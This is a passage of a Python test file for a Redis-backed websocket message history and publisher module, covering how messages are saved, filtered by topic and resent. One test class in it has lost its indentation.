    suite can only run on Python < 3.7, where `async` is not a reserved word.
    """

    def test_get_for(self):
        # Existing entry
        ws.RepositoryHistory(pk=666)
        result = ws.RepositoryHistory.get_for(666, async=False)
        self.assertEqual(result._pk, '666')
        self.assertTrue(result.connected)
        result = ws.RepositoryHistory.get_for(666, async=True)
        self.assertEqual(result._pk, '666')
        self.assertFalse(result.connected)
        # New entry
        result = ws.RepositoryHistory.get_for(667, async=False)
        self.assertEqual(result._pk, '667')
        self.assertTrue(result.connected)
        result = ws.RepositoryHistory.get_for(668, async=True)
        self.assertEqual(result._pk, '668')
        self.assertFalse(result.connected)

    def test_all_topics(self):
        obj = ws.RepositoryHistory.get_for(1)
        # Add two members
        obj.messages.get_for('foo').zadd(123, 'do-not-care')
        obj.messages.get_for('bar').zadd(456, 'still-do-not-care')
        topics = obj.all_topics()
        self.assertEqual(topics, {'foo', 'bar'})

    def test_save_message_without_pipeline(self):
        # Save a first message
        obj = ws.RepositoryHistory.get_for(1)
        obj.save_message(123, 'foo', 1, b=2)
        topics = obj.all_topics()
        self.assertEqual(topics, {'foo'})
        messages_foo = obj.messages.get_for('foo').zrange(0, -1, withscores=True)
        self.assertEqual(messages_foo, [
            (ws.serialize(123, 'foo', 1, b=2), 123),
        ])
        messages_bar = obj.messages.get_for('bar').zrange(0, -1, withscores=True)
        self.assertEqual(messages_bar, [])
        last_msg_id = obj.get_last_msg_id()
        self.assertEqual(last_msg_id, 123)
        # Save another message for the same repository, same topic
        obj = ws.RepositoryHistory.get_for(1)
        obj.save_message(124, 'foo', 11, b=22)
        topics = obj.all_topics()
        self.assertEqual(topics, {'foo'})
        messages_foo = obj.messages.get_for('foo').zrange(0, -1, withscores=True)
        self.assertEqual(messages_foo, [
            (ws.serialize(123, 'foo', 1, b=2), 123),
            (ws.serialize(124, 'foo', 11, b=22), 124),
        ])
        messages_bar = obj.messages.get_for('bar').zrange(0, -1, withscores=True)
        self.assertEqual(messages_bar, [])
        last_msg_id = obj.get_last_msg_id()
        self.assertEqual(last_msg_id, 124)
        # Save another message for the same repository, other topic
        obj = ws.RepositoryHistory.get_for(1)
        obj.save_message(125, 'bar', 111, b=222)
        topics = obj.all_topics()
        self.assertEqual(topics, {'foo', 'bar'})
        messages_foo = obj.messages.get_for('foo').zrange(0, -1, withscores=True)
        self.assertEqual(messages_foo, [
            (ws.serialize(123, 'foo', 1, b=2), 123),
            (ws.serialize(124, 'foo', 11, b=22), 124),
        ])
        messages_bar = obj.messages.get_for('bar').zrange(0, -1, withscores=True)
        self.assertEqual(messages_bar, [
            (ws.serialize(125, 'bar', 111, b=222), 125),
        ])
        last_msg_id = obj.get_last_msg_id()
        self.assertEqual(last_msg_id, 125)
        # Save another message for another repository, other topic
        obj = ws.RepositoryHistory.get_for(2)
        obj.save_message(126, 'bar', 1111, b=2222)
        topics = obj.all_topics()
        self.assertEqual(topics, {'bar'})
        messages_foo = obj.messages.get_for('foo').zrange(0, -1, withscores=True)
        self.assertEqual(messages_foo, [])
        messages_bar = obj.messages.get_for('bar').zrange(0, -1, withscores=True)
        self.assertEqual(messages_bar, [
            (ws.serialize(126, 'bar', 1111, b=2222), 126),
        ])
        last_msg_id = obj.get_last_msg_id()
        self.assertEqual(last_msg_id, 126)

    def test_save_message_with_pipeline(self):
        obj = ws.RepositoryHistory.get_for(1)
        with ws.RepositoryHistory.database.pipeline() as pipeline:
            obj.save_message(123, 'foo', 1, b=2)
            pipeline.execute()
        topics = obj.all_topics()
        self.assertEqual(topics, {'foo'})
        messages_foo = obj.messages.get_for('foo').zrange(0, -1, withscores=True)
        self.assertEqual(messages_foo, [
            (ws.serialize(123, 'foo', 1, b=2), 123),
        ])
        messages_bar = obj.messages.get_for('bar').zrange(0, -1, withscores=True)
        self.assertEqual(messages_bar, [])
        last_msg_id = obj.get_last_msg_id()
        self.assertEqual(last_msg_id, 123)

    def test_get_last_msg_id(self):
        entry = ws.RepositoryHistory(pk=666)
        result = entry.get_last_msg_id()
        self.assertEqual(result, 0)
        entry = ws.RepositoryHistory(pk=667, last_msg_id=123)
        result = entry.get_last_msg_id()
        self.assertEqual(result, 123)

    def test_get_new_msg_id(self):
        # Each call increments and persists the counter
        entry = ws.RepositoryHistory(pk=666)
        result = entry.get_new_msg_id()
        self.assertEqual(result, 1)
        result = entry.get_last_msg_id()
        self.assertEqual(result, 1)
        result = entry.get_new_msg_id()
        self.assertEqual(result, 2)
        result = entry.get_last_msg_id()
        self.assertEqual(result, 2)

    def test_get_last_msg_id_sent(self):
        entry = ws.RepositoryHistory(pk=666)
        result = entry.get_last_msg_id_sent()
        self.assertEqual(result, 0)
        entry = ws.RepositoryHistory(pk=667, last_msg_id_sent=123)
        result = entry.get_last_msg_id_sent()
        self.assertEqual(result, 123)

    def test_save_last_sent_message_without_pipeline(self):
        entry = ws.RepositoryHistory(pk=666)
        result = entry.get_last_msg_id_sent()
        self.assertEqual(result, 0)
        entry.save_last_sent_message(123)
        result = entry.get_last_msg_id_sent()
        self.assertEqual(result, 123)

    def test_save_last_sent_message_with_pipeline(self):
        entry = ws.RepositoryHistory(pk=666)
        result = entry.get_last_msg_id_sent()
        self.assertEqual(result, 0)
        with entry.database.pipeline() as pipeline:
            entry.save_last_sent_message(123)
            pipeline.execute()
        result = entry.get_last_msg_id_sent()
        self.assertEqual(result, 123)

    def test_get_messages(self):
        entry = ws.RepositoryHistory(pk=666)
        messages_foo = entry.messages.get_for('foo')
        messages_bar = entry.messages.get_for('bar.xxx')
        messages_baz = entry.messages.get_for('baz.yyy.baz')
        # Message id doubles as the zset score
        messages_foo.zadd(2, json.dumps({'foo': 'msg-2'}))
        messages_bar.zadd(3, json.dumps({'bar': 'msg-3'}))
        messages_foo.zadd(4, json.dumps({'foo': 'msg-4'}))
        messages_foo.zadd(5, json.dumps({'foo': 'msg-5'}))
        messages_baz.zadd(6, json.dumps({'baz': 'msg-6'}))
        result = entry.get_messages()
        self.assertEqual(result, [
            (2, {'foo': 'msg-2'}, 'foo', []),
            (3, {'bar': 'msg-3'}, 'bar.xxx', []),
            (4, {'foo': 'msg-4'}, 'foo', []),
            (5, {'foo': 'msg-5'}, 'foo', []),
            (6, {'baz': 'msg-6'}, 'baz.yyy.baz', []),
        ])
        result = entry.get_messages(topics_rules=[])
        self.assertEqual(result, [])
        result = entry.get_messages(topics_rules=[
            ('foo', ws.TOPIC_TYPE_EXACT),
            ('baz', ws.TOPIC_TYPE_PREFIX),
        ])
        self.assertEqual(result, [
            (2, {'foo': 'msg-2'}, 'foo', [('foo', ws.TOPIC_TYPE_EXACT), ]),
            (4, {'foo': 'msg-4'}, 'foo', [('foo', ws.TOPIC_TYPE_EXACT), ]),
            (5, {'foo': 'msg-5'}, 'foo', [('foo', ws.TOPIC_TYPE_EXACT), ]),
            (6, {'baz': 'msg-6'}, 'baz.yyy.baz', [('baz', ws.TOPIC_TYPE_PREFIX), ]),
        ])
        result = entry.get_messages(topics_rules=[
            ('qux', ws.TOPIC_TYPE_EXACT),
            ('bar.', ws.TOPIC_TYPE_PREFIX),
            ('baz..baz', ws.TOPIC_TYPE_WILDCARD),
        ])
        self.assertEqual(result, [
            (3, {'bar': 'msg-3'}, 'bar.xxx', [('bar.', ws.TOPIC_TYPE_PREFIX), ]),
            (6, {'baz': 'msg-6'}, 'baz.yyy.baz', [('baz..baz', ws.TOPIC_TYPE_WILDCARD), ]),
        ])
        # Positional args are (first_msg_id, last_msg_id): inclusive bounds
        result = entry.get_messages(3)
        self.assertEqual(result, [
            (3, {'bar': 'msg-3'}, 'bar.xxx', []),
            (4, {'foo': 'msg-4'}, 'foo', []),
            (5, {'foo': 'msg-5'}, 'foo', []),
            (6, {'baz': 'msg-6'}, 'baz.yyy.baz', []),
        ])
        result = entry.get_messages(last_msg_id=4)
        self.assertEqual(result, [
            (2, {'foo': 'msg-2'}, 'foo', []),
            (3, {'bar': 'msg-3'}, 'bar.xxx', []),
            (4, {'foo': 'msg-4'}, 'foo', []),
        ])
        result = entry.get_messages(3, 4)
        self.assertEqual(result, [
            (3, {'bar': 'msg-3'}, 'bar.xxx', []),
            (4, {'foo': 'msg-4'}, 'foo', []),
        ])
        result = entry.get_messages(3, 3)
        self.assertEqual(result, [
            (3, {'bar': 'msg-3'}, 'bar.xxx', []),
        ])
        result = entry.get_messages(4, 3)
        self.assertEqual(result, [])
        result = entry.get_messages(7, 9)
        self.assertEqual(result, [])
        result = entry.get_messages(7)
        self.assertEqual(result, [])
        result = entry.get_messages(last_msg_id=1)
        self.assertEqual(result, [])
        result = entry.get_messages(0.5, 1)
        self.assertEqual(result, [])

    def test_get_all_message_ids(self):
        entry = ws.RepositoryHistory(pk=666)
        result = entry.get_all_message_ids()
        self.assertEqual(result, [])
        messages_foo = entry.messages.get_for('foo')
        messages_bar = entry.messages.get_for('bar.xxx')
        messages_baz = entry.messages.get_for('baz.yyy.baz')
        messages_foo.zadd(2, json.dumps({'foo': 'msg-2'}))
        messages_bar.zadd(3, json.dumps({'bar': 'msg-3'}))
        messages_foo.zadd(4, json.dumps({'foo': 'msg-4'}))
        messages_foo.zadd(5, json.dumps({'foo': 'msg-5'}))
        messages_baz.zadd(6, json.dumps({'baz': 'msg-6'}))
        result = entry.get_all_message_ids()
        self.assertEqual(set(result), {2, 3, 4, 5, 6})

    def test_clean(self):
        entry = ws.RepositoryHistory(pk=666)
        # Prepare some topics
        messages_foo = entry.messages.get_for('foo')
        messages_bar = entry.messages.get_for('bar.xxx')
        # And save messages
        messages_foo.zadd(2, json.dumps({'foo': 'msg-2'}))
        messages_bar.zadd(3, json.dumps({'bar': 'msg-3'}))
        messages_foo.zadd(4, json.dumps({'foo': 'msg-4'}))
        messages_foo.zadd(5, json.dumps({'foo': 'msg-5'}))
        # Clean
        deleted = entry.clean(4)
        self.assertEqual(deleted, 2)
        # No trace of the deleted messages anymore
        result = entry.get_all_message_ids()
        self.assertEqual(set(result), {4, 5})
        # Do it for empty repository
        entry = ws.RepositoryHistory(pk=667)
        deleted = entry.clean(4)
        self.assertEqual(deleted, 0)
class AsyncRepositoryHistoryTestCase(UsingAsyncRedis):
    """Tests for `ws.AsyncRepositoryHistory`, the Twisted/txredis counterpart
    of `RepositoryHistory`, run against a real (flushed) redis database.

    Fix applied: `test_get_all_message_ids` previously asserted against the
    set literal ``{2, 3, 4, 5, 6, 6}`` — the duplicate `6` was a no-op typo,
    now written as ``{2, 3, 4, 5, 6}`` to match the sync counterpart.
    """

    @inlineCallbacks
    def test_get_for_without_pipeline(self):
        result = yield ws.AsyncRepositoryHistory.get_for(666)
        self.assertIsInstance(result.source_object, ws.RepositoryHistory)
        self.assertEqual(result.source_object._pk, '666')

    @inlineCallbacks
    def test_get_for_with_pipeline(self):
        pipeline = yield self.db.multi()
        result = yield ws.AsyncRepositoryHistory.get_for(666, pipeline=pipeline)
        yield pipeline.commit()
        self.assertIsInstance(result.source_object, ws.RepositoryHistory)
        self.assertEqual(result.source_object._pk, '666')

    @inlineCallbacks
    def test_all_topics(self):
        obj = yield ws.AsyncRepositoryHistory.get_for(1)
        # Add two members
        yield self.db.sadd(obj.source_object.messages._inventory.key, ['foo'])
        yield self.db.sadd(obj.source_object.messages._inventory.key, ['bar'])
        topics = yield obj.all_topics()
        self.assertEqual(topics, {'foo', 'bar'})

    @inlineCallbacks
    def test_save_message_without_pipeline(self):
        # Save a first message
        obj = yield ws.AsyncRepositoryHistory.get_for(1)
        yield obj.save_message(123, 'foo', 1, b=2)
        topics = yield obj.all_topics()
        self.assertEqual(topics, {'foo'})
        messages_foo = yield self.db.zrange(obj.source_object.messages.get_for('foo').key, 0, -1,
                                            withscores=True)
        self.assertEqual(messages_foo, [
            (ws.serialize(123, 'foo', 1, b=2), 123),
        ])
        messages_bar = yield self.db.zrange(obj.source_object.messages.get_for('bar').key, 0, -1,
                                            withscores=True)
        self.assertEqual(messages_bar, [])
        last_msg_id = yield obj.get_last_msg_id()
        self.assertEqual(last_msg_id, 123)
        # Save another message for the same repository, same topic
        obj = yield ws.AsyncRepositoryHistory.get_for(1)
        yield obj.save_message(124, 'foo', 11, b=22)
        topics = yield obj.all_topics()
        self.assertEqual(topics, {'foo'})
        messages_foo = yield self.db.zrange(obj.source_object.messages.get_for('foo').key, 0, -1,
                                            withscores=True)
        self.assertEqual(messages_foo, [
            (ws.serialize(123, 'foo', 1, b=2), 123),
            (ws.serialize(124, 'foo', 11, b=22), 124),
        ])
        messages_bar = yield self.db.zrange(obj.source_object.messages.get_for('bar').key, 0, -1,
                                            withscores=True)
        self.assertEqual(messages_bar, [])
        last_msg_id = yield obj.get_last_msg_id()
        self.assertEqual(last_msg_id, 124)
        # Save another message for the same repository, other topic
        obj = yield ws.AsyncRepositoryHistory.get_for(1)
        yield obj.save_message(125, 'bar', 111, b=222)
        topics = yield obj.all_topics()
        self.assertEqual(topics, {'foo', 'bar'})
        messages_foo = yield self.db.zrange(obj.source_object.messages.get_for('foo').key, 0, -1,
                                            withscores=True)
        self.assertEqual(messages_foo, [
            (ws.serialize(123, 'foo', 1, b=2), 123),
            (ws.serialize(124, 'foo', 11, b=22), 124),
        ])
        messages_bar = yield self.db.zrange(obj.source_object.messages.get_for('bar').key, 0, -1,
                                            withscores=True)
        self.assertEqual(messages_bar, [
            (ws.serialize(125, 'bar', 111, b=222), 125),
        ])
        last_msg_id = yield obj.get_last_msg_id()
        self.assertEqual(last_msg_id, 125)
        # Save another message for another repository, other topic
        obj = yield ws.AsyncRepositoryHistory.get_for(2)
        yield obj.save_message(126, 'bar', 1111, b=2222)
        topics = yield obj.all_topics()
        self.assertEqual(topics, {'bar'})
        messages_foo = yield self.db.zrange(obj.source_object.messages.get_for('foo').key, 0, -1,
                                            withscores=True)
        self.assertEqual(messages_foo, [])
        messages_bar = yield self.db.zrange(obj.source_object.messages.get_for('bar').key, 0, -1,
                                            withscores=True)
        self.assertEqual(messages_bar, [
            (ws.serialize(126, 'bar', 1111, b=2222), 126),
        ])
        last_msg_id = yield obj.get_last_msg_id()
        self.assertEqual(last_msg_id, 126)

    @inlineCallbacks
    def test_save_message_with_pipeline(self):
        obj = yield ws.AsyncRepositoryHistory.get_for(1)
        pipeline = yield self.db.multi()
        obj.save_message(123, 'foo', 1, b=2, pipeline=pipeline)
        yield pipeline.commit()
        topics = yield obj.all_topics()
        self.assertEqual(topics, {'foo'})
        messages_foo = yield self.db.zrange(obj.source_object.messages.get_for('foo').key, 0, -1,
                                            withscores=True)
        self.assertEqual(messages_foo, [
            (ws.serialize(123, 'foo', 1, b=2), 123),
        ])
        messages_bar = yield self.db.zrange(obj.source_object.messages.get_for('bar').key, 0, -1,
                                            withscores=True)
        self.assertEqual(messages_bar, [])
        last_msg_id = yield obj.get_last_msg_id()
        self.assertEqual(last_msg_id, 123)

    @inlineCallbacks
    def test_get_last_msg_id(self):
        entry = yield ws.AsyncRepositoryHistory.get_for(666)
        result = yield entry.get_last_msg_id()
        self.assertEqual(result, 0)
        entry = yield ws.AsyncRepositoryHistory.get_for(667)
        yield self.db.set(entry.source_object.last_msg_id.key, 123)
        result = yield entry.get_last_msg_id()
        self.assertEqual(result, 123)

    @inlineCallbacks
    def test_get_new_msg_id(self):
        # Each call increments and persists the counter
        entry = yield ws.AsyncRepositoryHistory.get_for(666)
        result = yield entry.get_new_msg_id()
        self.assertEqual(result, 1)
        result = yield entry.get_last_msg_id()
        self.assertEqual(result, 1)
        result = yield entry.get_new_msg_id()
        self.assertEqual(result, 2)
        result = yield entry.get_last_msg_id()
        self.assertEqual(result, 2)

    @inlineCallbacks
    def test_get_last_msg_id_sent(self):
        entry = yield ws.AsyncRepositoryHistory.get_for(666)
        result = yield entry.get_last_msg_id_sent()
        self.assertEqual(result, 0)
        entry = yield ws.AsyncRepositoryHistory.get_for(667)
        yield self.db.set(entry.source_object.last_msg_id_sent.key, 123)
        result = yield entry.get_last_msg_id_sent()
        self.assertEqual(result, 123)

    @inlineCallbacks
    def test_save_last_sent_message_without_pipeline(self):
        entry = yield ws.AsyncRepositoryHistory.get_for(666)
        result = yield entry.get_last_msg_id_sent()
        self.assertEqual(result, 0)
        yield entry.save_last_sent_message(123)
        result = yield entry.get_last_msg_id_sent()
        self.assertEqual(result, 123)

    @inlineCallbacks
    def test_save_last_sent_message_with_pipeline(self):
        entry = yield ws.AsyncRepositoryHistory.get_for(666)
        result = yield entry.get_last_msg_id_sent()
        self.assertEqual(result, 0)
        pipeline = yield self.db.multi()
        yield entry.save_last_sent_message(123, pipeline=pipeline)
        yield pipeline.commit()
        result = yield entry.get_last_msg_id_sent()
        self.assertEqual(result, 123)

    @inlineCallbacks
    def test_get_messages(self):
        entry = yield ws.AsyncRepositoryHistory.get_for(666)
        messages_foo = entry.source_object.messages.get_for('foo')
        messages_bar = entry.source_object.messages.get_for('bar.xxx')
        messages_baz = entry.source_object.messages.get_for('baz.yyy.baz')
        # Message id doubles as the zset score
        yield self.db.zadd(messages_foo.key, 2, json.dumps({'foo': 'msg-2'}))
        yield self.db.zadd(messages_bar.key, 3, json.dumps({'bar': 'msg-3'}))
        yield self.db.zadd(messages_foo.key, 4, json.dumps({'foo': 'msg-4'}))
        yield self.db.zadd(messages_foo.key, 5, json.dumps({'foo': 'msg-5'}))
        yield self.db.zadd(messages_baz.key, 6, json.dumps({'baz': 'msg-6'}))
        yield self.db.sadd(entry.source_object.messages._inventory.key,
                           ['foo', 'bar.xxx', 'baz.yyy.baz'])
        result = yield entry.get_messages()
        self.assertEqual(result, [
            (2, {'foo': 'msg-2'}, 'foo', []),
            (3, {'bar': 'msg-3'}, 'bar.xxx', []),
            (4, {'foo': 'msg-4'}, 'foo', []),
            (5, {'foo': 'msg-5'}, 'foo', []),
            (6, {'baz': 'msg-6'}, 'baz.yyy.baz', []),
        ])
        result = yield entry.get_messages(topics_rules=[])
        self.assertEqual(result, [])
        result = yield entry.get_messages(topics_rules=[
            ('foo', ws.TOPIC_TYPE_EXACT),
            ('baz', ws.TOPIC_TYPE_PREFIX),
        ])
        self.assertEqual(result, [
            (2, {'foo': 'msg-2'}, 'foo', [('foo', ws.TOPIC_TYPE_EXACT), ]),
            (4, {'foo': 'msg-4'}, 'foo', [('foo', ws.TOPIC_TYPE_EXACT), ]),
            (5, {'foo': 'msg-5'}, 'foo', [('foo', ws.TOPIC_TYPE_EXACT), ]),
            (6, {'baz': 'msg-6'}, 'baz.yyy.baz', [('baz', ws.TOPIC_TYPE_PREFIX), ]),
        ])
        result = yield entry.get_messages(topics_rules=[
            ('qux', ws.TOPIC_TYPE_EXACT),
            ('bar.', ws.TOPIC_TYPE_PREFIX),
            ('baz..baz', ws.TOPIC_TYPE_WILDCARD),
        ])
        self.assertEqual(result, [
            (3, {'bar': 'msg-3'}, 'bar.xxx', [('bar.', ws.TOPIC_TYPE_PREFIX), ]),
            (6, {'baz': 'msg-6'}, 'baz.yyy.baz', [('baz..baz', ws.TOPIC_TYPE_WILDCARD), ]),
        ])
        # Positional args are (first_msg_id, last_msg_id): inclusive bounds
        result = yield entry.get_messages(3)
        self.assertEqual(result, [
            (3, {'bar': 'msg-3'}, 'bar.xxx', []),
            (4, {'foo': 'msg-4'}, 'foo', []),
            (5, {'foo': 'msg-5'}, 'foo', []),
            (6, {'baz': 'msg-6'}, 'baz.yyy.baz', []),
        ])
        result = yield entry.get_messages(last_msg_id=4)
        self.assertEqual(result, [
            (2, {'foo': 'msg-2'}, 'foo', []),
            (3, {'bar': 'msg-3'}, 'bar.xxx', []),
            (4, {'foo': 'msg-4'}, 'foo', []),
        ])
        result = yield entry.get_messages(3, 4)
        self.assertEqual(result, [
            (3, {'bar': 'msg-3'}, 'bar.xxx', []),
            (4, {'foo': 'msg-4'}, 'foo', []),
        ])
        result = yield entry.get_messages(3, 3)
        self.assertEqual(result, [
            (3, {'bar': 'msg-3'}, 'bar.xxx', []),
        ])
        result = yield entry.get_messages(4, 3)
        self.assertEqual(result, [])
        result = yield entry.get_messages(7, 9)
        self.assertEqual(result, [])
        result = yield entry.get_messages(7)
        self.assertEqual(result, [])
        result = yield entry.get_messages(last_msg_id=1)
        self.assertEqual(result, [])
        result = yield entry.get_messages(0.5, 1)
        self.assertEqual(result, [])

    @inlineCallbacks
    def test_get_all_message_ids(self):
        entry = yield ws.AsyncRepositoryHistory.get_for(666)
        result = yield entry.get_all_message_ids()
        self.assertEqual(result, [])
        messages_foo = entry.source_object.messages.get_for('foo')
        messages_bar = entry.source_object.messages.get_for('bar.xxx')
        messages_baz = entry.source_object.messages.get_for('baz.yyy.baz')
        yield self.db.zadd(messages_foo.key, 2, json.dumps({'foo': 'msg-2'}))
        yield self.db.zadd(messages_bar.key, 3, json.dumps({'bar': 'msg-3'}))
        yield self.db.zadd(messages_foo.key, 4, json.dumps({'foo': 'msg-4'}))
        yield self.db.zadd(messages_foo.key, 5, json.dumps({'foo': 'msg-5'}))
        yield self.db.zadd(messages_baz.key, 6, json.dumps({'baz': 'msg-6'}))
        yield self.db.sadd(entry.source_object.messages._inventory.key,
                           ['foo', 'bar.xxx', 'baz.yyy.baz'])
        result = yield entry.get_all_message_ids()
        # Fixed: was `{2, 3, 4, 5, 6, 6}` (duplicate element in a set literal
        # is a no-op); now consistent with the sync test
        self.assertEqual(set(result), {2, 3, 4, 5, 6})

    @inlineCallbacks
    def test_delete(self):
        repo1 = yield ws.AsyncRepositoryHistory.get_for(666)
        repo2 = yield ws.AsyncRepositoryHistory.get_for(667)
        messages_1 = repo1.source_object.messages.get_for('foo')
        messages_2 = repo2.source_object.messages.get_for('bar.xxx')
        yield self.db.zadd(messages_1.key, 1, json.dumps({'foo': 'msg-1'}))
        yield repo1.save_last_sent_message(1)
        yield self.db.set(repo1.source_object.last_msg_id.key, 1)
        yield self.db.sadd(repo1.source_object.messages._inventory.key, ['foo'])
        yield self.db.zadd(messages_2.key, 2, json.dumps({'bar': 'msg-2'}))
        yield repo2.save_last_sent_message(1)
        yield self.db.set(repo2.source_object.last_msg_id.key, 1)
        yield self.db.sadd(repo2.source_object.messages._inventory.key, ['bar.xxx'])
        # Delete repo2
        yield repo2.delete()
        # No keys in redis for this repository anymore
        keys = yield self.db.keys(repo2.source_object.make_key(
            repo2.source_object._name,
            repo2.source_object._pk,
            '*'
        ))
        self.assertEqual(keys, [])
        # And check it is removed from the repositories collection
        collection = yield self.db.smembers(repo2.source_object.pk.collection_key)
        self.assertEqual(collection, {666})
class PublisherTestCase(UsingSyncRedis):
PK = ws.Publisher.PK
sPK = str(PK)
def setUp(self):
super(PublisherTestCase, self).setUp()
self.publisher = ws.Publisher.get_for(self.PK)
def test_get_for(self):
# Existing entry
result = ws.Publisher.get_for(666, async=False)
self.assertEqual(result._pk, self.sPK)
self.assertTrue(result.connected)
result = ws.Publisher.get_for(666, async=True)
self.assertEqual(result._pk, self.sPK)
self.assertFalse(result.connected)
# Without pk
result = ws.Publisher.get_for()
self.assertEqual(result._pk, self.sPK)
self.assertTrue(result.connected)
# Non existing entry
self.flushdb()
result = ws.Publisher.get_for(667, async=False)
self.assertEqual(result._pk, self.sPK)
self.assertTrue(result.connected)
self.flushdb()
result = ws.Publisher.get_for(668, async=True)
self.assertEqual(result._pk, self.sPK)
self.assertFalse(result.connected)
def test_singleton(self):
result1 = ws.Publisher.singleton()
self.assertIsInstance(result1, ws.Publisher)
self.assertEqual(result1._pk, self.sPK)
self.assertTrue(result1.connected)
result2 = ws.Publisher.singleton()
self.assertIs(result2, result1)
def test_lock_key(self):
self.assertEqual(self.publisher.lock_key, 'ws4:publisher:%s:lock' % self.sPK)
def test_lock_publishing(self):
lock = self.publisher.lock_publishing()
self.assertIsInstance(lock, Lock)
self.assertEqual(lock.name, self.publisher.lock_key)
def test_save_message_for_repository(self):
with patch.object(ws.RepositoryHistory, 'save_message') as repository_save_message:
msg_id = self.publisher.save_message('foo', 666, 11, b=22)
self.assertEqual(msg_id, 1)
result = self.publisher.get_last_msg_id()
self.assertEqual(result, 1)
# Check the message id is tied to the repository
repositories = self.publisher.repositories.zrange(0, -1, withscores=True)
self.assertEqual(repositories, [
('1:666', 1)
])
# We should have called `save_message` for the repository
repository_save_message.assert_called_once_with(1, 'foo', 11, b=22)
# And the message should not be stored in the global store
messages = self.publisher.messages.get_for('foo').zrange(0, -1, withscores=True)
self.assertEqual(messages, [])
def test_save_message_not_for_repository(self):
with patch.object(ws.RepositoryHistory, 'save_message') as repository_save_message:
msg_id = self.publisher.save_message('foo', None, 11, b=22)
self.assertEqual(msg_id, 1)
result = self.publisher.get_last_msg_id()
self.assertEqual(result, 1)
# Check the message id is NOT tied to the repository
repositories = self.publisher.repositories.zrange(0, -1, withscores=True)
self.assertEqual(repositories, [
('1:', 1)
])
# We should have NOT called `save_message` for the repository
self.assertEqual(repository_save_message.call_count, 0)
# But the message should be stored in the global store
messages = self.publisher.messages.get_for('foo').zrange(0, -1, withscores=True)
self.assertEqual(messages, [
(ws.serialize(1, 'foo', 11, b=22), 1),
])
def test_send_message_for_repository(self):
with patch.object(self.publisher.http_client, 'publish') as publish:
self.publisher.send_message(123, 'foo', 666, 11, b=22)
# We published to crossbar
publish.assert_called_once_with('foo', 11, b=22)
# We saved the last message for the repository
obj = ws.RepositoryHistory.get_for(666)
last_msg_id_sent = obj.get_last_msg_id_sent()
self.assertEqual(last_msg_id_sent, 123)
# And globally
last_msg_id_sent = self.publisher.get_last_msg_id_sent()
self.assertEqual(last_msg_id_sent, 123)
    def test_send_message_not_for_repository(self):
        """Sending without a repository only updates the global last-sent marker."""
        with patch.object(self.publisher.http_client, 'publish') as publish:
            with patch.object(ws.RepositoryHistory, 'save_last_sent_message') as \
                    repository_save_last_sent_message:
                self.publisher.send_message(123, 'foo', None, 11, b=22)
                # We published to crossbar
                publish.assert_called_once_with('foo', 11, b=22)
                # We DIDN'T save the last message for any repository
                self.assertEqual(repository_save_last_sent_message.call_count, 0)
                # But globally
                last_msg_id_sent = self.publisher.get_last_msg_id_sent()
                self.assertEqual(last_msg_id_sent, 123)
    def test_send_messages(self):
        """`send_messages` forwards each (id, topic, repo, args, kwargs) entry
        to `send_message`, adding the `ws_extra` metadata."""
        messages = [
            (5, 'gim.bar', '667', [1], {'b': 2}),
            (6, 'gim.foo', '666', [11], {'b': 22}),
            (7, 'gim.baz', None, [111], {'b': 222}),
        ]
        with patch.object(self.publisher, 'send_message') as send_message:
            self.publisher.send_messages(messages)
            self.assertEqual(send_message.call_args_list, [
                call(5, 'gim.bar', '667', 1, b=2, ws_extra={'topic': 'gim.bar', 'msg_id': 5}),
                call(6, 'gim.foo', '666', 11, b=22, ws_extra={'topic': 'gim.foo', 'msg_id': 6}),
                call(7, 'gim.baz', None, 111, b=222, ws_extra={'topic': 'gim.baz', 'msg_id': 7}),
            ])
    def test_publish_for_repository(self):
        """`publish` saves then sends the message, flushing unsent ones first."""
        with patch.object(self.publisher, 'save_message', return_value=123) as save_message:
            with patch.object(self.publisher, 'send_message') as send_message:
                with patch.object(self.publisher, 'send_unsent_messages') as send_unsent_messages:
                    msg_id = self.publisher.publish('foo', 666, 11, b=22)
                    self.assertEqual(msg_id, 123)
                    send_unsent_messages.assert_called_once_with()
                    # The topic is prefixed with 'gim.' by `publish`
                    save_message.assert_called_once_with('gim.foo', 666, 11, b=22)
                    send_message.assert_called_once_with(123, 'gim.foo', 666, 11, b=22,
                                                         ws_extra={'msg_id': 123, 'topic': 'gim.foo'})
    def test_publish_not_for_repository(self):
        """`publish` with repository=None behaves the same, without a repository."""
        with patch.object(self.publisher, 'save_message', return_value=123) as save_message:
            with patch.object(self.publisher, 'send_message') as send_message:
                with patch.object(self.publisher, 'send_unsent_messages') as send_unsent_messages:
                    msg_id = self.publisher.publish('foo', None, 11, b=22)
                    self.assertEqual(msg_id, 123)
                    send_unsent_messages.assert_called_once_with()
                    save_message.assert_called_once_with('gim.foo', None, 11, b=22)
                    send_message.assert_called_once_with(123, 'gim.foo', None, 11, b=22,
                                                         ws_extra={'msg_id': 123, 'topic': 'gim.foo'})
    def test_get_unsent_bounds(self):
        """Bounds are (last_sent + 1, last_saved); an empty range (start > end)
        means everything was already sent."""
        with patch.object(self.publisher, 'get_last_msg_id', return_value=10):
            with patch.object(self.publisher, 'get_last_msg_id_sent', return_value=5):
                result = self.publisher.get_unsent_bounds()
                self.assertEqual(result, (6, 10))
        with patch.object(self.publisher, 'get_last_msg_id', return_value=10):
            with patch.object(self.publisher, 'get_last_msg_id_sent', return_value=10):
                result = self.publisher.get_unsent_bounds()
                self.assertEqual(result, (11, 10))
    def test_send_unsent_messages(self):
        """Messages saved while sending was patched out are sent later, in order."""
        # Send some messages
        with patch.object(self.publisher.http_client, 'publish'):
            self.publisher.publish('foo', 666, 1, b=2)  # id 1
            self.publisher.publish('foo', 666, 11, b=22)  # id 2
            self.publisher.publish('foo', 666, 111, b=222)  # id 3
            self.publisher.publish('foo2', 666, 1111, b=2222)  # id 4
        # Send unsent ones: there is no unsent message
        with patch.object(self.publisher, 'send_messages') as send_messages:
            self.publisher.send_unsent_messages()
            self.assertEqual(send_messages.call_count, 0)
        # Fake send more messages (patched `send_message` keeps them "unsent")
        with patch.object(self.publisher, 'send_message'):
            # And don't try to send unsent messages for now
            with patch.object(self.publisher, 'send_unsent_messages'):
                self.publisher.publish('bar', 667, 11111, b=22222)  # id 5
                self.publisher.publish('foo', 666, 111111, b=222222)  # id 6
                self.publisher.publish('baz', None, 1111111, b=2222222)  # id 7
        # Send unsent ones: there are 3 unsent messages
        with patch.object(self.publisher, 'send_message') as send_message:
            self.publisher.send_unsent_messages()
            self.assertEqual(send_message.call_args_list, [
                call(5, 'gim.bar', '667', 11111, b=22222, ws_extra={'topic': 'gim.bar', 'msg_id': 5}),
